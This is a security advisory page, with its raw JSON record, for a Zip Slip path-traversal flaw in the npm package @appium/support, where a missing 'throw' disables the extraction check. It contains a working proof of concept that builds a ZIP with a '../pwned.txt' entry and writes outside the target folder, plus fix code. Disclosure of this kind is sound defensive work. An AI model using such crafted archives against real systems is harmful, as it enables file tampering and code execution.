GHSA-RFX7-4XW3-GH4M

Vulnerability from github – Published: 2026-03-11 00:22 – Updated: 2026-03-11 00:22
VLAI
Summary
@appium/support has a Zip Slip arbitrary file write in its ZIP extraction
Details

Summary

@appium/support contains a ZIP extraction implementation (extractAllTo() via ZipExtractor.extract()) with a path traversal (Zip Slip) check that is non-functional. The check at line 88 of packages/support/lib/zip.js creates an Error object but never throws it, allowing malicious ZIP entries with ../ path components to write files outside the intended destination directory. This affects all JS-based extractions (the default code path), not only those using the fileNamesEncoding option.

Severity

Medium (CVSS 3.1: 6.5)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

  • Attack Vector: Network — malicious ZIP files can be supplied over the network (e.g., app packages via URL)
  • Attack Complexity: Low — no special conditions required beyond providing a crafted ZIP
  • Privileges Required: None — no authentication needed to supply a malicious archive
  • User Interaction: Required — a user or automation system must initiate extraction of the attacker's archive
  • Scope: Unchanged — impact stays within the file system permissions of the Appium process
  • Confidentiality Impact: None — the vulnerability enables file writes, not reads
  • Integrity Impact: High — arbitrary file write to any location writable by the process
  • Availability Impact: None — no direct availability impact

Affected Component

  • packages/support/lib/zip.jsZipExtractor.extract() (line 88) and ZipExtractor.extractEntry() (lines 111-145)

CWE

  • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Description

Missing throw renders Zip Slip protection non-functional

The ZipExtractor.extract() method contains a path traversal check intended to prevent Zip Slip attacks. However, the check creates an Error object as a bare expression without the throw keyword, making it a no-op:

// packages/support/lib/zip.js, lines 80-93
const destDir = path.dirname(path.join(dir, fileName));
try {
    await fs.mkdir(destDir, {recursive: true});

    const canonicalDestDir = await fs.realpath(destDir);
    const relativeDestDir = path.relative(dir, canonicalDestDir);

    if (relativeDestDir.split(path.sep).includes('..')) {
        new Error(                                          // <-- BUG: missing `throw`
            `Out of bound path "${canonicalDestDir}" found while processing file ${fileName}`
        );
    }

    await this.extractEntry(entry);   // extraction proceeds unconditionally

The presence of a well-formatted error message and surrounding try/catch block (lines 95-99) strongly suggests the throw keyword was accidentally omitted.

yauzl does not provide its own traversal protection

The upstream yauzl library explicitly does not offer path traversal protection regardless of the decodeStrings setting. This means the vulnerability affects all JS-based extractions through ZipExtractor, not only those where fileNamesEncoding is set. The fileNamesEncoding option bypasses yauzl's string decoding (decodeStrings: false), but even with decodeStrings: true, yauzl passes through ../ path components without rejection.

Unprotected write sinks

The extractEntry method writes to attacker-controlled paths with no additional validation:

// packages/support/lib/zip.js, lines 111-145
const fileName = this.extractFileName(entry);
const dest = path.join(dir, fileName);         // resolves ../pwned.txt outside dir
// ...
await fs.symlink(link, dest);                  // symlink creation (line 143)
await pipeline(readStream, fs.createWriteStream(dest, {mode: procMode}));  // file write (line 145)

Additionally, _extractEntryTo() (line 263) used by readEntries() has no traversal check at all:

const dstPath = path.resolve(destDir, entry.fileName);  // no validation

Default code path is vulnerable

The extractAllTo() function uses the JS-based ZipExtractor by default. The system unzip fallback (useSystemUnzip: true) must be explicitly enabled and only provides protection if the system binary succeeds:

// packages/support/lib/zip.js, lines 203-210
if (opts.useSystemUnzip) {
    try {
        await extractWithSystemUnzip(zipFilePath, dir);
        return;
    } catch (err) {
        log.warn('unzip failed; falling back to JS: %s', err.stderr || err.message);
        // Falls through to the vulnerable JS implementation
    }
}

Proof of Concept

# 1) Install deps for the support package
cd packages/support
npm install --omit=dev --ignore-scripts --no-audit --no-fund --workspaces=false

# 2) Create a malicious ZIP containing a traversal entry
export WORK=/tmp/appium_zip_slip_poc
rm -rf "$WORK" && mkdir -p "$WORK/dest"
python3 - <<'PY'
import zipfile, os
work = os.environ['WORK']
zip_path = os.path.join(work, 'evil.zip')
with zipfile.ZipFile(zip_path, 'w') as z:
    z.writestr('../pwned.txt', 'ZIPSLIP_MARKER')
print('created', zip_path)
PY

# 3) Extract with the JS implementation (default path, no fileNamesEncoding needed)
node --experimental-default-type=module --experimental-specifier-resolution=node - <<'NODE'
import path from 'node:path';
import fs from 'node:fs/promises';
import { extractAllTo } from './lib/zip.js';

const work = process.env.WORK;
const zipPath = path.join(work, 'evil.zip');
const dest = path.join(work, 'dest');

await extractAllTo(zipPath, dest, { useSystemUnzip: false });

const outside = path.join(work, 'pwned.txt');
console.log('outside exists?', await fs.stat(outside).then(() => true, () => false));
console.log('outside content:', (await fs.readFile(outside, 'utf8')).trim());
NODE
# Expected output:
# outside exists? true
# outside content: ZIPSLIP_MARKER

Impact

  • Arbitrary file write: An attacker can write files to any location writable by the Appium process, outside the intended extraction directory.
  • Arbitrary symlink creation: Malicious ZIP entries with symlink attributes can create symlinks pointing to arbitrary targets, enabling further attacks on subsequent file operations.
  • Potential code execution: By overwriting scripts, configuration files, node_modules contents, cron jobs, shell profiles, or other executable artifacts, arbitrary file write can chain into remote code execution.
  • Affects all JS-based extractions: The default code path (without useSystemUnzip: true) is vulnerable regardless of whether fileNamesEncoding is set.

Recommended Remediation

Option 1: Add the missing throw keyword (preferred — minimal fix)

// packages/support/lib/zip.js, line 88
if (relativeDestDir.split(path.sep).includes('..')) {
    throw new Error(   // Add `throw`
        `Out of bound path "${canonicalDestDir}" found while processing file ${fileName}`
    );
}

This is the lowest-risk fix: it restores the clearly intended behavior of the existing check. The try/catch block at lines 95-99 will catch the error, set canceled = true, close the zip, and reject the promise — exactly the designed error-handling flow.

Option 2: Add traversal protection to _extractEntryTo as well

The _extractEntryTo function (line 262) also lacks a traversal check. For defense-in-depth, add validation there too:

async function _extractEntryTo(zipFile, entry, destDir) {
    const dstPath = path.resolve(destDir, entry.fileName);
    const canonicalDest = path.resolve(dstPath);
    const canonicalDestDir = path.resolve(destDir);
    if (!canonicalDest.startsWith(canonicalDestDir + path.sep) && canonicalDest !== canonicalDestDir) {
        throw new Error(
            `Out of bound path "${canonicalDest}" found while processing file ${entry.fileName}`
        );
    }
    // ... rest of function
}

Credit

This vulnerability was discovered and reported by bugbunny.ai.

Severity
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.0.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@appium/support"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30973"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-11T00:22:38Z",
    "nvd_published_at": "2026-03-10T18:18:56Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\n`@appium/support` contains a ZIP extraction implementation (`extractAllTo()` via `ZipExtractor.extract()`) with a path traversal (Zip Slip) check that is non-functional. The check at line 88 of `packages/support/lib/zip.js` creates an `Error` object but never throws it, allowing malicious ZIP entries with `../` path components to write files outside the intended destination directory. This affects all JS-based extractions (the default code path), not only those using the `fileNamesEncoding` option.\n\n## Severity\n\n**Medium** (CVSS 3.1: 6.5)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`\n\n- **Attack Vector:** Network \u2014 malicious ZIP files can be supplied over the network (e.g., app packages via URL)\n- **Attack Complexity:** Low \u2014 no special conditions required beyond providing a crafted ZIP\n- **Privileges Required:** None \u2014 no authentication needed to supply a malicious archive\n- **User Interaction:** Required \u2014 a user or automation system must initiate extraction of the attacker\u0027s archive\n- **Scope:** Unchanged \u2014 impact stays within the file system permissions of the Appium process\n- **Confidentiality Impact:** None \u2014 the vulnerability enables file writes, not reads\n- **Integrity Impact:** High \u2014 arbitrary file write to any location writable by the process\n- **Availability Impact:** None \u2014 no direct availability impact\n\n## Affected Component\n\n- `packages/support/lib/zip.js` \u2014 `ZipExtractor.extract()` (line 88) and `ZipExtractor.extractEntry()` (lines 111-145)\n\n## CWE\n\n- **CWE-22**: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\n\n## Description\n\n### Missing `throw` renders Zip Slip protection non-functional\n\nThe `ZipExtractor.extract()` method contains a path traversal check intended to prevent Zip Slip attacks. However, the check creates an `Error` object as a bare expression without the `throw` keyword, making it a no-op:\n\n```javascript\n// packages/support/lib/zip.js, lines 80-93\nconst destDir = path.dirname(path.join(dir, fileName));\ntry {\n    await fs.mkdir(destDir, {recursive: true});\n\n    const canonicalDestDir = await fs.realpath(destDir);\n    const relativeDestDir = path.relative(dir, canonicalDestDir);\n\n    if (relativeDestDir.split(path.sep).includes(\u0027..\u0027)) {\n        new Error(                                          // \u003c-- BUG: missing `throw`\n            `Out of bound path \"${canonicalDestDir}\" found while processing file ${fileName}`\n        );\n    }\n\n    await this.extractEntry(entry);   // extraction proceeds unconditionally\n```\n\nThe presence of a well-formatted error message and surrounding try/catch block (lines 95-99) strongly suggests the `throw` keyword was accidentally omitted.\n\n### yauzl does not provide its own traversal protection\n\nThe upstream `yauzl` library explicitly [does not offer path traversal protection](https://github.com/thejoshwolfe/yauzl#no-path-traversal-protection) regardless of the `decodeStrings` setting. This means the vulnerability affects **all** JS-based extractions through `ZipExtractor`, not only those where `fileNamesEncoding` is set. The `fileNamesEncoding` option bypasses yauzl\u0027s string decoding (`decodeStrings: false`), but even with `decodeStrings: true`, yauzl passes through `../` path components without rejection.\n\n### Unprotected write sinks\n\nThe `extractEntry` method writes to attacker-controlled paths with no additional validation:\n\n```javascript\n// packages/support/lib/zip.js, lines 111-145\nconst fileName = this.extractFileName(entry);\nconst dest = path.join(dir, fileName);         // resolves ../pwned.txt outside dir\n// ...\nawait fs.symlink(link, dest);                  // symlink creation (line 143)\nawait pipeline(readStream, fs.createWriteStream(dest, {mode: procMode}));  // file write (line 145)\n```\n\nAdditionally, `_extractEntryTo()` (line 263) used by `readEntries()` has no traversal check at all:\n\n```javascript\nconst dstPath = path.resolve(destDir, entry.fileName);  // no validation\n```\n\n### Default code path is vulnerable\n\nThe `extractAllTo()` function uses the JS-based `ZipExtractor` by default. The system unzip fallback (`useSystemUnzip: true`) must be explicitly enabled and only provides protection if the system binary succeeds:\n\n```javascript\n// packages/support/lib/zip.js, lines 203-210\nif (opts.useSystemUnzip) {\n    try {\n        await extractWithSystemUnzip(zipFilePath, dir);\n        return;\n    } catch (err) {\n        log.warn(\u0027unzip failed; falling back to JS: %s\u0027, err.stderr || err.message);\n        // Falls through to the vulnerable JS implementation\n    }\n}\n```\n\n## Proof of Concept\n\n```bash\n# 1) Install deps for the support package\ncd packages/support\nnpm install --omit=dev --ignore-scripts --no-audit --no-fund --workspaces=false\n\n# 2) Create a malicious ZIP containing a traversal entry\nexport WORK=/tmp/appium_zip_slip_poc\nrm -rf \"$WORK\" \u0026\u0026 mkdir -p \"$WORK/dest\"\npython3 - \u003c\u003c\u0027PY\u0027\nimport zipfile, os\nwork = os.environ[\u0027WORK\u0027]\nzip_path = os.path.join(work, \u0027evil.zip\u0027)\nwith zipfile.ZipFile(zip_path, \u0027w\u0027) as z:\n    z.writestr(\u0027../pwned.txt\u0027, \u0027ZIPSLIP_MARKER\u0027)\nprint(\u0027created\u0027, zip_path)\nPY\n\n# 3) Extract with the JS implementation (default path, no fileNamesEncoding needed)\nnode --experimental-default-type=module --experimental-specifier-resolution=node - \u003c\u003c\u0027NODE\u0027\nimport path from \u0027node:path\u0027;\nimport fs from \u0027node:fs/promises\u0027;\nimport { extractAllTo } from \u0027./lib/zip.js\u0027;\n\nconst work = process.env.WORK;\nconst zipPath = path.join(work, \u0027evil.zip\u0027);\nconst dest = path.join(work, \u0027dest\u0027);\n\nawait extractAllTo(zipPath, dest, { useSystemUnzip: false });\n\nconst outside = path.join(work, \u0027pwned.txt\u0027);\nconsole.log(\u0027outside exists?\u0027, await fs.stat(outside).then(() =\u003e true, () =\u003e false));\nconsole.log(\u0027outside content:\u0027, (await fs.readFile(outside, \u0027utf8\u0027)).trim());\nNODE\n# Expected output:\n# outside exists? true\n# outside content: ZIPSLIP_MARKER\n```\n\n## Impact\n\n- **Arbitrary file write**: An attacker can write files to any location writable by the Appium process, outside the intended extraction directory.\n- **Arbitrary symlink creation**: Malicious ZIP entries with symlink attributes can create symlinks pointing to arbitrary targets, enabling further attacks on subsequent file operations.\n- **Potential code execution**: By overwriting scripts, configuration files, `node_modules` contents, cron jobs, shell profiles, or other executable artifacts, arbitrary file write can chain into remote code execution.\n- **Affects all JS-based extractions**: The default code path (without `useSystemUnzip: true`) is vulnerable regardless of whether `fileNamesEncoding` is set.\n\n## Recommended Remediation\n\n### Option 1: Add the missing `throw` keyword (preferred \u2014 minimal fix)\n\n```javascript\n// packages/support/lib/zip.js, line 88\nif (relativeDestDir.split(path.sep).includes(\u0027..\u0027)) {\n    throw new Error(   // Add `throw`\n        `Out of bound path \"${canonicalDestDir}\" found while processing file ${fileName}`\n    );\n}\n```\n\nThis is the lowest-risk fix: it restores the clearly intended behavior of the existing check. The try/catch block at lines 95-99 will catch the error, set `canceled = true`, close the zip, and reject the promise \u2014 exactly the designed error-handling flow.\n\n### Option 2: Add traversal protection to `_extractEntryTo` as well\n\nThe `_extractEntryTo` function (line 262) also lacks a traversal check. For defense-in-depth, add validation there too:\n\n```javascript\nasync function _extractEntryTo(zipFile, entry, destDir) {\n    const dstPath = path.resolve(destDir, entry.fileName);\n    const canonicalDest = path.resolve(dstPath);\n    const canonicalDestDir = path.resolve(destDir);\n    if (!canonicalDest.startsWith(canonicalDestDir + path.sep) \u0026\u0026 canonicalDest !== canonicalDestDir) {\n        throw new Error(\n            `Out of bound path \"${canonicalDest}\" found while processing file ${entry.fileName}`\n        );\n    }\n    // ... rest of function\n}\n```\n\n## Credit\n\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).",
  "id": "GHSA-rfx7-4xw3-gh4m",
  "modified": "2026-03-11T00:22:38Z",
  "published": "2026-03-11T00:22:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/appium/appium/security/advisories/GHSA-rfx7-4xw3-gh4m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30973"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/appium/appium"
    },
    {
      "type": "WEB",
      "url": "https://github.com/appium/appium/releases/tag/@appium/support@7.0.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@appium/support has a Zip Slip arbitrary file write in its ZIP extraction"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.